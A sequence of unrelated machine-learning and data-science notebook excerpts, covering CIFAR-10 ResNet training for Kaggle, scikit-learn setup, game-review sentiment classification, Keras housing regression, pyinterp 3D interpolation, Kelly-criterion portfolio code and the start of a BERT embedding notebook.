We only set the batch size to $4$ for the demo dataset. During actual training and testing, the complete dataset of the Kaggle competition should be used and `batch_size` should be set to a larger integer, such as $128$. We use $10\%$ of the training examples as the validation set for tuning hyperparameters.
```
batch_size = 4 if demo else 128
valid_ratio = 0.1
reorg_cifar10_data(data_dir, valid_ratio)
```
## Image Augmentation
To cope with overfitting, we use image augmentation. For example, by adding `torchvision.transforms.RandomHorizontalFlip()`, the images can be flipped at random. We can also normalize the three RGB channels of color images using `torchvision.transforms.Normalize()`. Below, we list some of these operations, which you can choose to use or modify depending on your requirements.
```
transform_train = torchvision.transforms.Compose([
# Magnify the image to a square of 40 pixels in both height and width
torchvision.transforms.Resize(40),
# Randomly crop a square image of 40 pixels in both height and width to
# produce a small square of 0.64 to 1 times the area of the original
# image, and then shrink it to a square of 32 pixels in both height and
# width
torchvision.transforms.RandomResizedCrop(32, scale=(0.64, 1.0),
ratio=(1.0, 1.0)),
torchvision.transforms.RandomHorizontalFlip(),
torchvision.transforms.ToTensor(),
# Normalize each channel of the image
torchvision.transforms.Normalize([0.4914, 0.4822, 0.4465],
[0.2023, 0.1994, 0.2010])])
```
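As a quick sanity check (not part of the original notebook), we can apply `transform_train` to a dummy 32x32 RGB image and confirm that the output is a 3x32x32 tensor:
```
import numpy as np
from PIL import Image

# Dummy image used only to check shapes; any 32x32 RGB PIL image would do.
dummy = Image.fromarray(np.zeros((32, 32, 3), dtype=np.uint8))
print(transform_train(dummy).shape)  # torch.Size([3, 32, 32])
```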
To keep the output deterministic during testing, we only perform normalization (with no random augmentation) on the images.
```
transform_test = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize([0.4914, 0.4822, 0.4465],
[0.2023, 0.1994, 0.2010])])
```
## Reading the Dataset
Next, we create `ImageFolder` instances to read the organized dataset containing the original image files, where each example includes the image and its label.
```
train_ds, train_valid_ds = [torchvision.datasets.ImageFolder(
os.path.join(data_dir, 'train_valid_test', folder),
transform=transform_train) for folder in ['train', 'train_valid']]
valid_ds, test_ds = [torchvision.datasets.ImageFolder(
os.path.join(data_dir, 'train_valid_test', folder),
transform=transform_test) for folder in ['valid', 'test']]
```
We wrap the datasets defined above (each with its own transform) in `DataLoader` instances. During training, the validation set is used only to evaluate the model, so its output must be deterministic and it uses the test-time transform. For the final prediction, we will train the model on the combined training and validation sets to make full use of all labelled data.
```
train_iter, train_valid_iter = [torch.utils.data.DataLoader(
dataset, batch_size, shuffle=True, drop_last=True)
for dataset in (train_ds, train_valid_ds)]
valid_iter = torch.utils.data.DataLoader(valid_ds, batch_size, shuffle=False,
drop_last=True)
test_iter = torch.utils.data.DataLoader(test_ds, batch_size, shuffle=False,
drop_last=False)
```
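To verify that the iterators produce what we expect, we can peek at one mini-batch (a quick check that is not in the original notebook):
```
# For the demo settings this prints torch.Size([4, 3, 32, 32]) and torch.Size([4]).
X, y = next(iter(train_iter))
print(X.shape, y.shape)
```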
## Defining the Model
Here, we define the ResNet-18 model described in :numref:`sec_resnet`. The CIFAR-10 image classification challenge uses 10 categories, so the network's output layer has 10 units, and a fresh model is created before training begins.
```
def get_net():
num_classes = 10
# PyTorch doesn't have the notion of hybrid model
net = d2l.resnet18(num_classes, 3)
return net
loss = nn.CrossEntropyLoss(reduction="none")
```
## Defining the Training Functions
We will select the model and tune hyperparameters according to the model's performance on the validation set. Next, we define the model training function `train`. We record the training time of each epoch, which helps us compare the time costs of different models.
```
def train(net, train_iter, valid_iter, num_epochs, lr, wd, devices, lr_period,
lr_decay):
trainer = torch.optim.SGD(net.parameters(), lr=lr, momentum=0.9,
weight_decay=wd)
scheduler = torch.optim.lr_scheduler.StepLR(trainer, lr_period, lr_decay)
num_batches, timer = len(train_iter), d2l.Timer()
animator = d2l.Animator(xlabel='epoch', xlim=[1, num_epochs],
legend=['train loss', 'train acc', 'valid acc'])
net = nn.DataParallel(net, device_ids=devices).to(devices[0])
for epoch in range(num_epochs):
net.train()
metric = d2l.Accumulator(3)
for i, (features, labels) in enumerate(train_iter):
timer.start()
l, acc = d2l.train_batch_ch13(net, features, labels,
loss, trainer, devices)
metric.add(l, acc, labels.shape[0])
timer.stop()
if (i + 1) % (num_batches // 5) == 0 or i == num_batches - 1:
animator.add(epoch + (i + 1) / num_batches,
(metric[0] / metric[2], metric[1] / metric[2],
None))
if valid_iter is not None:
valid_acc = d2l.evaluate_accuracy_gpu(net, valid_iter)
animator.add(epoch + 1, (None, None, valid_acc))
scheduler.step()
if valid_iter is not None:
print(f'loss {metric[0] / metric[2]:.3f}, '
f'train acc {metric[1] / metric[2]:.3f}, '
f'valid acc {valid_acc:.3f}')
else:
print(f'loss {metric[0] / metric[2]:.3f}, '
f'train acc {metric[1] / metric[2]:.3f}')
print(f'{metric[2] * num_epochs / timer.sum():.1f} examples/sec '
f'on {str(devices)}')
```
## Training and Validating the Model
Now, we can train and validate the model. The following hyperparameters can be tuned. For example, we can increase the number of epochs. Because `lr_period` and `lr_decay` are set to 50 and 0.1 respectively, the learning rate of the optimization algorithm will be multiplied by 0.1 after every 50 epochs. For simplicity, we only train one epoch here.
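A quick way to see what this schedule implies for the learning rate (illustrative only; the values mirror those used below):
```
lr, lr_period, lr_decay = 0.1, 50, 0.1
for epoch in (0, 49, 50, 99, 100):
    # StepLR multiplies the learning rate by lr_decay every lr_period epochs
    print(epoch, lr * lr_decay ** (epoch // lr_period))
```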
```
devices, num_epochs, lr, wd = d2l.try_all_gpus(), 5, 0.1, 5e-4
lr_period, lr_decay, net = 50, 0.1, get_net()
train(net, train_iter, valid_iter, num_epochs, lr, wd, devices, lr_period,
lr_decay)
```
## Classifying the Testing Set and Submitting Results on Kaggle
After obtaining a satisfactory model design and hyperparameters, we use all the training data (including the validation set) to retrain the model and classify the testing set.
```
net, preds = get_net(), []
train(net, train_valid_iter, None, num_epochs, lr, wd, devices, lr_period,
lr_decay)
for X, _ in test_iter:
y_hat = net(X.to(devices[0]))
preds.extend(y_hat.argmax(dim=1).type(torch.int32).cpu().numpy())
sorted_ids = list(range(1, len(test_ds) + 1))
sorted_ids.sort(key=lambda x: str(x))
df = pd.DataFrame({'id': sorted_ids, 'label': preds})
df['label'] = df['label'].apply(lambda x: train_valid_ds.classes[x])
df.to_csv('submission.csv', index=False)
```
After executing the above code, we will get a "submission.csv" file whose format is consistent with the Kaggle competition requirements. The method for submitting results is similar to the method in :numref:`sec_kaggle_house`.
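A quick way to double-check the format before uploading (assuming the cell above has been run):
```
print(pd.read_csv('submission.csv').head())
```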
## Summary
* We can create `ImageFolder` instances to read the dataset containing the original image files.
* We can use convolutional neural networks and image augmentation to take part in an image classification competition.
## Exercises
1. Use the complete CIFAR-10 dataset for the Kaggle competition. Change the `batch_size` and number of epochs `num_epochs` to 128 and 100, respectively. See what accuracy and ranking you can achieve in this competition.
1. What accuracy can you achieve when not using image augmentation?
1. Scan the QR code to access the relevant discussions and exchange ideas about the methods used and the results obtained with the community. Can you come up with any better techniques?
[Discussions](https://discuss.d2l.ai/t/1479)
<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>
# An Introduction to scikit-learn: Machine Learning in Python
## Goals of this Tutorial
- **Introduce the basics of Machine Learning**, and some skills useful in practice.
- **Introduce the syntax of scikit-learn**, so that you can make use of the rich toolset available.
## Schedule:
**Preliminaries: Setup & introduction** (15 min)
* Making sure your computer is set up
**Basic Principles of Machine Learning and the Scikit-learn Interface** (45 min)
* What is Machine Learning?
* Machine learning data layout
* Supervised Learning
- Classification
- Regression
- Measuring performance
* Unsupervised Learning
- Clustering
- Dimensionality Reduction
- Density Estimation
* Evaluation of Learning Models
* Choosing the right algorithm for your dataset
**Supervised learning in-depth** (1 hr)
* Support Vector Machines
* Decision Trees and Random Forests
**Unsupervised learning in-depth** (1 hr)
* Principal Component Analysis
* K-means Clustering
* Gaussian Mixture Models
**Model Validation** (1 hr)
* Validation and Cross-validation
## Preliminaries
This tutorial requires the following packages:
- Python version 2.7 or 3.4+
- `numpy` version 1.8 or later: http://www.numpy.org/
- `scipy` version 0.15 or later: http://www.scipy.org/
- `matplotlib` version 1.3 or later: http://matplotlib.org/
- `scikit-learn` version 0.15 or later: http://scikit-learn.org
- `ipython`/`jupyter` version 3.0 or later, with notebook support: http://ipython.org
- `seaborn`: version 0.5 or later, used mainly for plot styling
The easiest way to get these is to use the [conda](http://store.continuum.io/) environment manager.
I suggest downloading and installing [miniconda](http://conda.pydata.org/miniconda.html).
The following command will install all required packages:
```
$ conda install numpy scipy matplotlib scikit-learn ipython-notebook
```
Alternatively, you can download and install the (very large) Anaconda software distribution, found at https://store.continuum.io/.
### Checking your installation
You can run the following code to check the versions of the packages on your system:
(in IPython notebook, press `shift` and `return` together to execute the contents of a cell)
```
from __future__ import print_function
import IPython
print('IPython:', IPython.__version__)
import numpy
print('numpy:', numpy.__version__)
import scipy
print('scipy:', scipy.__version__)
import matplotlib
print('matplotlib:', matplotlib.__version__)
import sklearn
print('scikit-learn:', sklearn.__version__)
```
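`seaborn` is listed among the requirements above but is not covered by the check; you can verify it the same way (assuming it is installed):
```
import seaborn
print('seaborn:', seaborn.__version__)
```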
## Useful Resources
- **scikit-learn:** http://scikit-learn.org (see especially the narrative documentation)
- **matplotlib:** http://matplotlib.org (see especially the gallery section)
- **Jupyter:** http://jupyter.org (also check out http://nbviewer.jupyter.org)
```
import numpy as np
import pandas as pd
import re
import os
import random
import spacy
from spacy.util import minibatch, compounding
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
```
## File input and cleaning
```
def label_sentiment(filename):
'''
Looks at the rating values and assigns either a positive or a negative label; used for training and testing. Assumes every rating is either <= 4 or >= 7.
'''
df = pd.read_csv(filename)
ls = []
for index, row in df.iterrows():
if row['rating'] >= 7:
label = 'pos'
elif row['rating'] <= 4:
label = 'neg'
ls.append(label)
df['label'] = ls
ls2 = []
for index, row in df.iterrows():
clean = row['review'].strip()
ls2.append(clean)
df['review'] = ls2
ls3 = []
for index, row in df.iterrows():
if row['rating'] >= 7:
sentiment = 1
elif row['rating'] <= 4:
sentiment = 0
ls3.append(sentiment)
df['sentiment'] = ls3
return df
def remove_emoji(string):
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002702-\U000027B0"
u"\U000024C2-\U0001F251"
"]+", flags=re.UNICODE)
return emoji_pattern.sub(r'', string)
df = label_sentiment('MetacriticReviews_DOTA2.csv')
df['review'] = df['review'].apply(remove_emoji)
df.head()
df['sentiment'].value_counts()
X = df['review']
y = df['sentiment']
```
### Classification by logistic regression
```
## split test-train 80/20
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2)
len(X_train)
cv = CountVectorizer()
ctmTr = cv.fit_transform(X_train)
X_test_dtm = cv.transform(X_test)
model = LogisticRegression()
model.fit(ctmTr, y_train)
y_pred_class = model.predict(X_test_dtm)
y_pred_class
accuracy_score(y_test, y_pred_class)
```
### Import Valorant and League data
```
!ls
df_valorant = label_sentiment('MetacriticReviews_VALORANT PC.csv')
df_valorant['review'] = df_valorant['review'].apply(remove_emoji)
df_valorant.head()
## split valorant data
X_val = df_valorant['review']
y_val = df_valorant['sentiment']
X_train_val, X_test_val, y_train_val, y_test_val = train_test_split(X_val,y_val,test_size=0.2)
## test dota 2 classifier on Valorant test data
X_test_dtm_val = cv.transform(X_test_val)
y_pred_class_val = model.predict(X_test_dtm_val)
accuracy_score(y_test_val, y_pred_class_val)
## When trained on Dota 2 data and tested on Valorant reviews, the classifier still reaches
## a fairly decent accuracy of about 71%, a drop of roughly 5% from our original accuracy.
```
# California housing dataset regression with MLPs
In this notebook, we'll train a multi-layer perceptron model to estimate median house values for Californian housing districts.
First, the needed imports. Keras tells us which backend (Theano, Tensorflow, CNTK) it will be using.
```
%matplotlib inline
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import StandardScaler
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout
from keras.utils import np_utils
from keras import backend as K
from distutils.version import LooseVersion as LV
from keras import __version__
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
print('Using Keras version:', __version__, 'backend:', K.backend())
assert(LV(__version__) >= LV("2.0.0"))
```
## Data
Then we load the California housing data. The first time this is run, the data needs to be downloaded, which can take a while.
```
chd = datasets.fetch_california_housing()
```
The data consists of 20640 housing districts, each characterized with 8 attributes: *MedInc, HouseAge, AveRooms, AveBedrms, Population, AveOccup, Latitude, Longitude*. There is also a target value (median house value) for each housing district.
Let's plot all attributes against the target value:
```
plt.figure(figsize=(15,10))
for i in range(8):
plt.subplot(4,2,i+1)
plt.scatter(chd.data[:,i], chd.target, s=2, label=chd.feature_names[i])
plt.legend(loc='best')
```
We'll now split the data into a training and a test set:
```
test_size = 5000
X_train_all, X_test_all, y_train, y_test = train_test_split(
chd.data, chd.target, test_size=test_size, shuffle=True)
X_train_single = X_train_all[:,0].reshape(-1, 1)
X_test_single = X_test_all[:,0].reshape(-1, 1)
print()
print('California housing data: train:',len(X_train_all),'test:',len(X_test_all))
print()
print('X_train_all:', X_train_all.shape)
print('X_train_single:', X_train_single.shape)
print('y_train:', y_train.shape)
print()
print('X_test_all', X_test_all.shape)
print('X_test_single', X_test_single.shape)
print('y_test', y_test.shape)
```
The training data matrix `X_train_all` is a matrix of size (`n_train`, 8), and `X_train_single` contains only the first attribute *(MedInc)*. `y_train` is a vector containing the target value (median house value) for each housing district in the training set.
Let's start our analysis with a single attribute *(MedInc)*:
```
X_train = X_train_single
X_test = X_test_single
#X_train = X_train_all
#X_test = X_test_all
```
As the final step, let's scale the input data to zero mean and unit variance:
```
scaler = StandardScaler().fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
print('X_train: mean:', X_train.mean(axis=0), 'std:', X_train.std(axis=0))
print('X_test: mean:', X_test.mean(axis=0), 'std:', X_test.std(axis=0))
```
## One hidden layer
### Initialization
Let's begin with a simple model that has a single hidden layer. We first initialize the model with `Sequential()`. Then we add a `Dense` layer that has `X_train.shape[1]` inputs (one for each attribute in the training data) and 10 units. The `Dense` layer connects each input to each output with some weight parameter.
Then we have an output layer that has only one unit with a linear activation function.
Finally, we select *mean squared error* as the loss function, select [*stochastic gradient descent*](https://keras.io/optimizers/#sgd) as the optimizer, and `compile()` the model. Note there are [several different options](https://keras.io/optimizers/) for the optimizer in Keras that we could use instead of *sgd*.
```
linmodel = Sequential()
linmodel.add(Dense(units=10, input_dim=X_train.shape[1], activation='relu'))
linmodel.add(Dense(units=1, activation='linear'))
linmodel.compile(loss='mean_squared_error',
optimizer='sgd')
print(linmodel.summary())
```
We can also draw a fancier graph of our model.
```
SVG(model_to_dot(linmodel, show_shapes=True).create(prog='dot', format='svg'))
```
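As noted above, swapping in a different optimizer only requires changing the `optimizer` argument; for example (a sketch that is not used in the rest of this notebook):
```
altmodel = Sequential()
altmodel.add(Dense(units=10, input_dim=X_train.shape[1], activation='relu'))
altmodel.add(Dense(units=1, activation='linear'))
altmodel.compile(loss='mean_squared_error', optimizer='rmsprop')
```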
### Learning
Now we are ready to train our first model. An *epoch* means one pass through the whole training data.
You can run code below multiple times and it will continue the training process from where it left off. If you want to start from scratch, re-initialize the model using the code a few cells ago.
```
%%time
epochs = 10
linhistory = linmodel.fit(X_train,
y_train,
epochs=epochs,
batch_size=32,
verbose=2)
```
Let's now see how the training progressed. *Loss* is a function of the difference of the network output and the target values. We are minimizing the loss function during training so it should decrease over time.
```
plt.figure(figsize=(5,3))
plt.plot(linhistory.epoch,linhistory.history['loss'])
plt.title('loss');
if X_train.shape[1] == 1:
plt.figure(figsize=(10, 10))
plt.scatter(X_train, y_train, s=5)
reg_x = np.arange(np.min(X_train), np.max(X_train), 0.01).reshape(-1, 1)
plt.scatter(reg_x, linmodel.predict(reg_x), s=8, label='one hidden layer')
plt.legend(loc='best');
```
### Inference
For a better measure of the quality of the model, let's compute the mean squared error on the test data.
```
%%time
predictions = linmodel.predict(X_test)
print("Mean squared error: %.3f"
% mean_squared_error(y_test, predictions))
```
## Multiple hidden layers
### Initialization
Let's now create a more complex MLP model that has multiple dense layers and dropout layers. `Dropout()` randomly sets a fraction of inputs to zero during training, which is one approach to regularization and can sometimes help to prevent overfitting.
The last layer needs to have a single unit with linear activation to match the ground truth (`y_train`).
Finally, we again `compile()` the model, this time using [*Adam*](https://keras.io/optimizers/#adam) as the optimizer.
```
mlmodel = Sequential()
mlmodel.add(Dense(units=20, input_dim=X_train.shape[1], activation='relu'))
mlmodel.add(Dense(units=20, activation='relu'))
mlmodel.add(Dropout(0.5))
mlmodel.add(Dense(units=1, activation='linear'))
mlmodel.compile(loss='mean_squared_error',
optimizer='adam')
print(mlmodel.summary())
SVG(model_to_dot(mlmodel, show_shapes=True).create(prog='dot', format='svg'))
```
### Learning
```
%%time
epochs = 10
history = mlmodel.fit(X_train,
y_train,
epochs=epochs,
batch_size=32,
verbose=2)
plt.figure(figsize=(5,3))
plt.plot(history.epoch,history.history['loss'])
plt.title('loss');
if X_train.shape[1] == 1:
plt.figure(figsize=(10, 10))
plt.scatter(X_train, y_train, s=5)
reg_x = np.arange(np.min(X_train), np.max(X_train), 0.01).reshape(-1, 1)
plt.scatter(reg_x, linmodel.predict(reg_x), s=8, label='one hidden layer')
plt.scatter(reg_x, mlmodel.predict(reg_x), s=8, label='multiple hidden layers')
plt.legend(loc='best');
```
### Inference
```
%%time
predictions = mlmodel.predict(X_test)
print("Mean squared error: %.3f"
% mean_squared_error(y_test, predictions))
```
## Model tuning
Try to reduce the mean squared error of the regression.
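One possible direction, sketched here as a suggestion rather than as the notebook's answer: use all eight attributes instead of `MedInc` alone and train the multi-layer model a little longer (the layer sizes, optimizer, and epoch count below are assumptions to tune freely).
```
scaler_all = StandardScaler().fit(X_train_all)
X_train_f = scaler_all.transform(X_train_all)
X_test_f = scaler_all.transform(X_test_all)

tuned = Sequential()
tuned.add(Dense(units=64, input_dim=X_train_f.shape[1], activation='relu'))
tuned.add(Dense(units=64, activation='relu'))
tuned.add(Dense(units=1, activation='linear'))
tuned.compile(loss='mean_squared_error', optimizer='adam')
tuned.fit(X_train_f, y_train, epochs=30, batch_size=32, verbose=0)

print("Mean squared error: %.3f"
      % mean_squared_error(y_test, tuned.predict(X_test_f)))
```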
# 3D interpolation
This example shows how to interpolate values from arbitrary points in a 3D space of a function defined on a Cartesian grid.
The methods used perform an interpolation in the 2D space spanned by the grid's longitude and latitude axes, and then perform a linear interpolation along the third dimension using the two values obtained from the 2D interpolation.
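In symbols, if $v_0$ and $v_1$ are the two values obtained by the 2D interpolation at the time steps $t_0$ and $t_1$ bracketing the requested time $t$, the result is the linear blend $v = v_0 + \frac{t - t_0}{t_1 - t_0}\,(v_1 - v_0)$.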
Let's start by building our interpolator:
```
import xarray as xr
import pyinterp.backends.xarray as pxr
ds = xr.load_dataset("../tests/dataset/tcw.nc")
# The grid used organizes the latitudes in descending order. We ask our
# constructor to flip this axis in order to correctly evaluate the bicubic
# interpolation from this 3D cube (only necessary to perform a bicubic
# interpolation).
interpolator = pxr.Grid3D(ds.data_vars["tcw"], increasing_axes=True)
interpolator
```
We will now build the coordinates of the new grid onto which the data will be interpolated.
```
import datetime
import numpy as np
# The coordinates used for interpolation are shifted to avoid using the
# points of the trivariate function.
mx, my, mz = np.meshgrid(
np.arange(-180, 180, 0.25) + 1 / 3.0,
np.arange(-80, 80, 0.25) + 1 / 3.0,
np.array([datetime.datetime(2002, 7, 2, 15, 0)], dtype="datetime64"),
indexing='ij')
```
We interpolate our grid first using a classical [trivariate](https://pangeo-pyinterp.readthedocs.io/en/latest/generated/pyinterp.trivariate.html#pyinterp.trivariate) interpolation, and then using a [bicubic](https://pangeo-pyinterp.readthedocs.io/en/latest/generated/pyinterp.bicubic.html) interpolation in space followed by a linear interpolation along the temporal axis.
```
trivariate = interpolator.trivariate(
dict(longitude=mx.flatten(), latitude=my.flatten(), time=mz.flatten()))
bicubic = interpolator.bicubic(
dict(longitude=mx.flatten(), latitude=my.flatten(), time=mz.flatten()))
```
We reshape the interpolation results back into matrices.
```
trivariate = trivariate.reshape(mx.shape).squeeze(axis=2)
bicubic = bicubic.reshape(mx.shape).squeeze(axis=2)
lons = mx[:, 0].squeeze()
lats = my[0, :].squeeze()
```
Let's visualize our results.
```
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
%matplotlib inline
fig = plt.figure(figsize=(18, 9))
ax = fig.add_subplot(121, projection=ccrs.PlateCarree(central_longitude=180))
ax.pcolormesh(lons, lats, trivariate.T, cmap='jet',
transform=ccrs.PlateCarree())
ax.coastlines()
ax.set_extent([80, 170, -45, 30], crs=ccrs.PlateCarree())
ax.set_title("Trilinear")
ax = fig.add_subplot(122, projection=ccrs.PlateCarree(central_longitude=180))
ax.pcolormesh(lons, lats, bicubic.T, cmap='jet',
transform=ccrs.PlateCarree())
ax.coastlines()
ax.set_extent([80, 170, -45, 30], crs=ccrs.PlateCarree())
ax.set_title("Bicubic & Linear in time")
```
# Risk Management and The Kelly Criterion
By Gideon Wulfsohn, Delaney Granizo-Mackenzie, and Thomas Wiecki
Part of the Quantopian Lecture Series:
* [quantopian.com/lectures](https://www.quantopian.com/lectures)
* [github.com/quantopian/research_public](https://github.com/quantopian/research_public)
Notebook released under the Creative Commons Attribution 4.0 License.
---
The Kelly Criterion is a method that was developed by John Larry Kelly Jr. while working at Bell Labs. Popularized by horse race gamblers and later by investors, the formula can be applied as a useful heuristic when deciding what percentage of your total capital should be allocated to a given strategy.
Let's run through a simple application of the Kelly Criterion, which is defined as follows:
**Kelly Optimal Leverage = (m - r) / s<sup>2</sup>**
* m = mean annual return
* r = risk-free rate (taken as 4% in the code below)
* s = annualized standard deviation of returns
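As a quick illustration with made-up numbers (not taken from the data below): an asset with a 12% expected excess return and 20% annualized volatility gets a Kelly optimal leverage of 0.12 / 0.2<sup>2</sup> = 3.
```
# Illustrative only -- these inputs are assumptions, not estimates from data.
mean_excess = 0.12   # expected annual excess return over the risk-free rate
sigma = 0.20         # annualized standard deviation of returns
print(mean_excess / sigma**2)   # 3.0, i.e. 3x leverage
```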
```
# get pricing data for S&P 500 over a 13 year timeframe
start = '2002-01-02'
end = '2015-11-09'
df = get_pricing('SPY', fields=['close_price'], start_date=start, end_date=end)
# compute daily returns, add as new column within dataframe
daily_returns = (df.close_price.shift(-1) - df.close_price) / df.close_price
df = df.ix[1:]
df['daily_returns'] = daily_returns
df.head()
# compute mean and sd of annual return using daily returns (252 trading days per year)
mean_annual_return = df.daily_returns.mean() * 252
annualized_std = df.daily_returns.std() * (252**.5)
print mean_annual_return
print annualized_std
mean_excess_return = mean_annual_return - .04
sharpe_ratio = mean_excess_return / annualized_std
opt_leverage = mean_excess_return / (annualized_std**2)
print "Sharpe Ratio: {}".format(sharpe_ratio)
print "Kelly Optimal Leverage: {}".format(opt_leverage)
capital = 100000
purchase = int(capital * opt_leverage)
print "If the kelly optimal leverage is {} and you have ${} to invest, you should \
buy ${} worth of SPY under the assumption you believe the \
expected values of your returns by viewing them as gaussian.".format(opt_leverage, capital, purchase)
```
# Mean-Variance Example
```
import math
import numpy as np
import cvxopt as opt
import matplotlib.pyplot as plt
from cvxopt import blas, solvers
np.random.seed(89)
# prevent cvxopt progress from printing
solvers.options['show_progress'] = False
# num assets
n = 4
# number of observations
nobs = 1000
def rand_weights(n):
''' Produces n random weights that sum to 1 '''
k = np.random.randn(n)
return k / sum(k)
def gen_returns(asset_count, nobs, drift=0.0):
'''
Creates normally distributed series
:params:
asset_count: <int> number of series to create
nobs: <int> number of observations
drift: <float> skews the distribution to one side
:returns:
np.ndarray with <asset_count> rows and <nobs> columns
'''
return np.random.randn(asset_count, nobs) + drift
def random_portfolio(returns, weight_func):
'''
Returns the mean and standard deviation of returns for a random portfolio
'''
w = weight_func(returns.shape[0])
mu = np.dot(np.mean(returns, axis=1) , w)
sigma = math.sqrt(np.dot(w, np.dot(np.cov(returns), w)))
# This recursion reduces outliers
if sigma > 2:
return random_portfolio(returns, weight_func)
return sigma, mu
# gather returns and plot
return_vec = gen_returns(n, nobs, drift=0.01)
stds, means = np.column_stack(
[random_portfolio(return_vec, rand_weights) for _ in xrange(500)]
)
f, ax = plt.subplots()
plt.plot(stds, means, 'o')
ax.set_xlabel('Volatility')
ax.set_ylabel('Return')
# convert to matrix
k = np.array(return_vec)
S = opt.matrix (np.cov(k))
pbar = opt.matrix(np.mean(k, axis=1))
# conditioning optimizer
G = -opt.matrix(np.eye(n)) # negative n x n identity matrix
h = opt.matrix(0.0, (n ,1))
A = opt.matrix(1.0, (1, n))
b = opt.matrix(1.0)
# expected returns
N = 100
mus = [10**(5.0* t/N - 1.0) for t in range(N)]
# efficient frontier weights
portfolios = [
solvers.qp(mu*S, -pbar, G, h, A, b)['x']
for mu in mus
]
# risk and return
returns = [blas.dot(pbar, x) for x in portfolios]
risks = [np.sqrt(blas.dot(x, S*x)) for x in portfolios]
plt.plot(risks, returns, 'y-o')
def get_kelly_portfolios():
ww = np.dot(np.linalg.inv(opt.matrix(S)), opt.matrix(pbar))
rks = []; res = [];
for i in np.arange(0.05, 20, 0.0001):
w = ww / i
rks.append(blas.dot(pbar, opt.matrix(w)))
res.append(np.sqrt(blas.dot(opt.matrix(w), S*opt.matrix(w))))
return res, rks
res, rks = get_kelly_portfolios()
# display kelly portfolios for various leverages
plt.plot(res, rks, 'ko', markersize=3)
plt.plot(res, np.array(rks) * -1, 'ko', markersize=3);
```
# BERT Embedding Generation
This notebook generates BERT<sub>BASE</sub> embeddings using different pooling strategies.
```
import os
import urllib
from google.colab import drive, files
from getpass import getpass
from google.colab import drive
ROOT = '/content/drive'
GOOGLE_DRIVE_PATH = 'My Drive/Colab Notebooks/recommender/w266-final'
PROJECT_PATH = os.path.join(ROOT, GOOGLE_DRIVE_PATH)
drive.mount(ROOT)
%cd {PROJECT_PATH}
import os
import sys
import re
import pandas as pd
import numpy as np
import itertools
import pickle
import random
import tensorflow as tf
from commons.store import PickleStore, NpyStore
from tqdm import tqdm
from IPython.core.display import HTML
from importlib import reload
%load_ext autoreload
%autoreload 2
```
## 1. Load Pre-filtered Dataset
Load the clean pre-processed dataset.
```
amazon = False
if amazon:
input_pkl = '../dataset/25-65_tokens_grouped_Movies_and_TV_v2.pkl'
else:
input_pkl = '../dataset/25-65_tokens_grouped_yelp.pkl'
pkl_store = PickleStore(input_pkl)
grouped_reviews_df = pkl_store.load(asPandasDF=True, \
columns=['reviewerID', 'asin', 'overall', 'userReviews', 'itemReviews'])
print(len(grouped_reviews_df))
display(HTML(grouped_reviews_df.head(1).to_html()))
#grouped_reviews = grouped_reviews_df[['userReviews', 'itemReviews', 'overall']].to_numpy()
grouped_reviews = grouped_reviews_df.to_numpy()
grouped_reviews[0]
!pip install transformers
import tensorflow as tf
from transformers import BertTokenizer
from transformers import TFBertModel, BertConfig
# Detect hardware
try:
tpu_resolver = tf.distribute.cluster_resolver.TPUClusterResolver() # TPU detection
except ValueError:
tpu_resolver = None
gpus = tf.config.experimental.list_logical_devices("GPU")
# Select appropriate distribution strategy
if tpu_resolver:
tf.config.experimental_connect_to_cluster(tpu_resolver)
tf.tpu.experimental.initialize_tpu_system(tpu_resolver)
strategy = tf.distribute.experimental.TPUStrategy(tpu_resolver)
print('Running on TPU ', tpu_resolver.cluster_spec().as_dict()['worker'])
elif len(gpus) > 1:
strategy = tf.distribute.MirroredStrategy([gpu.name for gpu in gpus])
print('Running on multiple GPUs ', [gpu.name for gpu in gpus])
elif len(gpus) == 1:
strategy = tf.distribute.get_strategy() # default strategy that works on CPU and single GPU
print('Running on single GPU ', gpus[0].name)
else:
strategy = tf.distribute.get_strategy() # default strategy that works on CPU and single GPU
print('Running on CPU')
print("Number of accelerators: ", strategy.num_replicas_in_sync)
```
We use the Hugging Face <img src='https://huggingface.co/front/assets/huggingface_logo.svg' width='20px'> `transformers` library to load the BERT tokenizer and model.
```
bert_model_name = 'bert-base-uncased'
MAX_LEN = 128
config = BertConfig()
config.output_hidden_states = True # set to True to obtain hidden states
with strategy.scope():
tokenizer = BertTokenizer.from_pretrained(bert_model_name, do_lower_case=True)
user_bert = TFBertModel.from_pretrained(bert_model_name, config=config)
item_bert = TFBertModel.from_pretrained(bert_model_name, config=config)
```
## 2. Pooling Strategies
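Each strategy below reduces one or more BERT hidden-state layers of shape `(batch, seq_len, hidden)` to a fixed-size vector. The rough sketch below (random tensors standing in for real BERT outputs, purely to illustrate the shapes) mirrors the main ideas; the functions in this notebook additionally average across all reviews in a group via `GlobalAveragePooling2D`.
```
import tensorflow as tf

# Toy stand-in for BERT outputs: 13 hidden-state layers of shape (batch, seq_len, hidden)
hidden_states = [tf.random.normal((2, 8, 4)) for _ in range(13)]

# 2.1-style: mean-pool the last hidden state over the sequence dimension -> (batch, hidden)
last = tf.reduce_mean(hidden_states[-1], axis=1)

# 2.2-style: sum the last four layers, then mean-pool -> (batch, hidden)
sum4 = tf.reduce_mean(tf.reduce_sum(tf.stack(hidden_states[-4:]), axis=0), axis=1)

# 2.6-style: concatenate the last four layers along the hidden dimension -> (batch, 4 * hidden)
cat4 = tf.reduce_mean(tf.concat(hidden_states[-4:], axis=2), axis=1)

print(last.shape, sum4.shape, cat4.shape)  # (2, 4) (2, 4) (2, 16)
```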
### 2.1. Last Hidden State
```
